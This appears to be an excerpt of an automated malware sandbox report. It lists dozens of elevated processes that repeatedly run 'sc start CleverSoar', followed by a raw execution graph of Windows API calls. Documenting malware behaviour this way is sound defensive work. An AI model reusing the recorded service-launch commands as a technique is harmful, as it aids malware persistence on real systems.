                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:54
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:55
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:56
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:57
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:58
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:59
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:60
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:61
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:62
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:63
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:64
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:65
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:66
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:67
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:68
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:69
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:70
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:71
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:72
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:73
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:74
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:75
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:76
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:77
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:79
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:80
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:81
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:82
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:83
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:84
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:85
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:86
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:87
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:88
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:89
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:90
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:91
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:92
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:93
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:94
                                                                                                              Start time:02:38:38
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:1.4%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:5.1%
                                                                                                                Total number of Nodes:742
                                                                                                                Total number of Limit Nodes:8
                                                                                                                execution_graph 91818 6c80f150 91820 6c80efbe 91818->91820 91819 6c80f243 CreateFileA 91823 6c80f2a7 91819->91823 91820->91819 91821 6c8102ca 91822 6c8102ac GetCurrentProcess TerminateProcess 91822->91821 91823->91821 91823->91822 91824 6c803b72 91837 6c975863 91824->91837 91827 6c81639e 91900 6c97ef50 18 API calls 2 library calls 91827->91900 91833 6c8037e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 91833->91827 91851 6c9698b0 91833->91851 91857 6c816ba0 91833->91857 91876 6c816e60 91833->91876 91886 6c817090 91833->91886 91899 6c83e010 67 API calls 91833->91899 91839 6c975868 91837->91839 91838 6c975882 91838->91833 91839->91838 91842 6c975884 std::_Facet_Register 91839->91842 91901 6c97de34 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 91839->91901 91841 6c9766e3 std::_Facet_Register 91905 6c978199 RaiseException 91841->91905 91842->91841 91902 6c978199 RaiseException 91842->91902 91844 6c976edc IsProcessorFeaturePresent 91849 6c976f01 91844->91849 91846 6c9766a3 91903 6c978199 RaiseException 91846->91903 91848 6c9766c3 std::invalid_argument::invalid_argument 91904 6c978199 RaiseException 91848->91904 91849->91833 91852 6c9698c6 FindFirstFileA 91851->91852 91853 6c9698c4 91851->91853 91854 6c969900 91852->91854 91853->91852 91855 6c969949 FindClose 91854->91855 91856 6c969960 91854->91856 91855->91854 91856->91833 91858 6c816bd5 91857->91858 91906 6c842020 91858->91906 91860 6c816c68 91861 6c975863 std::_Facet_Register 4 API calls 91860->91861 91862 6c816ca0 91861->91862 91923 6c976147 91862->91923 91864 6c816cb4 91935 6c841d90 91864->91935 91867 6c816d8e 91867->91833 91869 6c816dc8 91943 6c8426e0 24 API calls 4 library calls 91869->91943 91871 6c816dda 91944 6c978199 RaiseException 91871->91944 91873 6c816def 91945 6c83e010 67 API calls 91873->91945 91875 6c816e0f 91875->91833 91877 6c816e9f 91876->91877 91880 6c816eb3 91877->91880 92340 6c843560 32 API calls std::_Xinvalid_argument 91877->92340 91882 6c816f5b 91880->91882 92342 6c842250 30 API calls 91880->92342 92343 6c8426e0 24 API calls 4 library calls 91880->92343 92344 6c978199 RaiseException 91880->92344 91885 6c816f6e 91882->91885 92341 6c8437e0 32 API calls std::_Xinvalid_argument 91882->92341 91885->91833 91887 6c81709e 91886->91887 91888 6c8170d1 91886->91888 92345 6c8401f0 91887->92345 91890 6c817183 91888->91890 92349 6c842250 30 API calls 91888->92349 91890->91833 91893 6c97f938 67 API calls 91893->91888 91894 6c8171ae 92350 6c842340 24 API calls 91894->92350 91896 6c8171be 92351 6c978199 RaiseException 91896->92351 91898 6c8171c9 91899->91833 91901->91839 91902->91846 91903->91848 91904->91841 91905->91844 91907 6c975863 std::_Facet_Register 4 API calls 91906->91907 91908 6c84207e 91907->91908 91909 6c976147 43 API calls 91908->91909 91910 6c842092 91909->91910 91946 6c842f60 42 API calls 4 library calls 91910->91946 91912 6c8420c8 91913 6c84210d 91912->91913 91914 6c842136 91912->91914 91917 6c842120 91913->91917 91947 6c975dae 9 API calls 2 library calls 91913->91947 91948 6c842250 30 API calls 91914->91948 91917->91860 91918 6c84215b 91949 6c842340 24 API calls 91918->91949 91920 6c842171 91950 6c978199 RaiseException 91920->91950 91922 6c84217c 91922->91860 91924 6c976153 __EH_prolog3 91923->91924 91951 6c975cd5 91924->91951 91928 6c976171 91965 6c9761da 39 API calls std::locale::_Setgloballocale 91928->91965 91930 6c9761cc 91930->91864 91932 6c976179 91966 6c975fd1 HeapFree GetLastError _Yarn ___std_exception_destroy 91932->91966 91934 6c97618f 91957 6c975d06 91934->91957 91936 6c816d5d 91935->91936 91937 6c841ddc 91935->91937 91936->91867 91942 6c842250 30 API calls 91936->91942 91971 6c976267 91937->91971 91941 6c841e82 91942->91869 91943->91871 91944->91873 91945->91875 91946->91912 91947->91917 91948->91918 91949->91920 91950->91922 91952 6c975ce4 91951->91952 91954 6c975ceb 91951->91954 91967 6c97f1ed 6 API calls std::_Lockit::_Lockit 91952->91967 91955 6c975ce9 91954->91955 91968 6c9773ab EnterCriticalSection 91954->91968 91955->91934 91964 6c976050 6 API calls 2 library calls 91955->91964 91958 6c975d10 91957->91958 91959 6c97f1fb 91957->91959 91963 6c975d23 91958->91963 91969 6c9773b9 LeaveCriticalSection 91958->91969 91970 6c97f1d6 LeaveCriticalSection 91959->91970 91962 6c97f202 91962->91930 91963->91930 91964->91928 91965->91932 91966->91934 91967->91955 91968->91955 91969->91963 91970->91962 91972 6c976270 91971->91972 91973 6c841dea 91972->91973 91980 6c97eb6a 91972->91980 91973->91936 91979 6c97b383 18 API calls __cftoe 91973->91979 91975 6c9762bc 91975->91973 91991 6c97e878 65 API calls 91975->91991 91977 6c9762d7 91977->91973 91992 6c97f938 91977->91992 91979->91941 91981 6c97eb75 __wsopen_s 91980->91981 91982 6c97eb88 91981->91982 91983 6c97eba8 91981->91983 92017 6c97ef40 18 API calls __cftoe 91982->92017 91987 6c97eb98 91983->91987 92003 6c989c2c 91983->92003 91987->91975 91991->91977 91993 6c97f944 __wsopen_s 91992->91993 91994 6c97f963 91993->91994 91995 6c97f94e 91993->91995 92002 6c97f95e 91994->92002 92198 6c97b3c9 EnterCriticalSection 91994->92198 92213 6c97ef40 18 API calls __cftoe 91995->92213 91998 6c97f980 92199 6c97f9bc 91998->92199 92000 6c97f98b 92214 6c97f9b2 LeaveCriticalSection 92000->92214 92002->91973 92004 6c989c38 __wsopen_s 92003->92004 92019 6c97f1bf EnterCriticalSection 92004->92019 92006 6c989c46 92020 6c989cd0 92006->92020 92011 6c989d92 92012 6c989eb1 92011->92012 92044 6c989f34 92012->92044 92015 6c97ebec 92018 6c97ec15 LeaveCriticalSection 92015->92018 92017->91987 92018->91987 92019->92006 92021 6c989cf3 92020->92021 92022 6c989d4b 92021->92022 92028 6c989c53 92021->92028 92037 6c97b3c9 EnterCriticalSection 92021->92037 92038 6c97b3dd LeaveCriticalSection 92021->92038 92039 6c986005 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 92022->92039 92024 6c989d54 92040 6c9835db HeapFree GetLastError __dosmaperr 92024->92040 92027 6c989d5d 92027->92028 92041 6c985a3f 6 API calls std::_Lockit::_Lockit 92027->92041 92034 6c989c8c 92028->92034 92031 6c989d7c 92042 6c97b3c9 EnterCriticalSection 92031->92042 92033 6c989d8f 92033->92028 92043 6c97f1d6 LeaveCriticalSection 92034->92043 92036 6c97ebc3 92036->91987 92036->92011 92037->92021 92038->92021 92039->92024 92040->92027 92041->92031 92042->92033 92043->92036 92045 6c989f53 92044->92045 92046 6c989f66 92045->92046 92050 6c989f7b 92045->92050 92060 6c97ef40 18 API calls __cftoe 92046->92060 92048 6c989ec7 92048->92015 92057 6c992dfe 92048->92057 92050->92050 92055 6c98a09b 92050->92055 92061 6c992cc8 37 API calls __cftoe 92050->92061 92052 6c98a0eb 92052->92055 92062 6c992cc8 37 API calls __cftoe 92052->92062 92054 6c98a109 92054->92055 